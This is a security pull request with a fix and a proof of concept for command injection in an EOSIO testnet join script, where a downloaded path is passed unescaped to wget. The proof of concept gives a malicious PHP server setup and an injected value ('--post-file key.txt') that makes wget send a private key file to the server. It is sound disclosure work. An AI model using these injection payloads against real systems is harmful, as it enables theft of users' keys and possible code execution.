### PR TITLE
Fix command injection allowing arbitrary file disclosure and possibly RCE

### DIFF
--- a/one-click-join/2_download_configuration.sh
+++ b/one-click-join/2_download_configuration.sh
@@ -1,4 +1,4 @@
-wget http://api.eosio.sg$(cat ./path.txt)
+wget -B http://api.eosio.sg/ -i path.txt
 
 tar xfp eosiosg.tar && rm eosiosg.tar ;
 


### PR DESCRIPTION
path.txt is downloaded from api.eosio.sg and then replaced into a wget without proper escaping allowing at least parameter inyection into wget. This allows a malicious api.eosio.sg to retrieve files from users who run one-click-join or possibly run arbitrary code on the machines.

**Credit**: EOS Argentina
**Type**: Arbitrary file disclosure (possibly also Remote Code Execution using wget -e param)
**Severity**: HIGH 
**Exploitability**: medium

## POC
Only for 
Point api.eosio.sg to simulate a malicious or infected api.

### Malicious Server

```
# server.sh
# Add this line to yout /etc/hosts
# 127.0.0.1 api.eosio.sg eosio.sg
# -------------------------------------

cd /tmp
git clone https://github.com/eosiosg/testnet.git

mkdir testnet/one-click-pwn
cd testnet/one-click-pwn
echo "<?= file_get_contents('php://input');" > index.php

mkdir secureNode
echo "/ --post-file key.txt -O -" > secureNode/index.php

sudo php -S api.eosio.sg:80

```

### Running the client as usual

```
cd /tmp/testnet/one-click-join
./0_init_configuration.sh
```

If you don't have cleos installed on the test machine you can skip first steps.

```
cd /tmp/testnet/one-click-join
echo "/ --post-file key.txt -O -" > path.txt
echo "SUPER SECRET PRIVATE KEY" > key.txt
./2_download_configuration.sh
```

![poc](https://user-images.githubusercontent.com/555365/39753064-d0809fc4-52bd-11e8-802c-93b122aceffe.png)
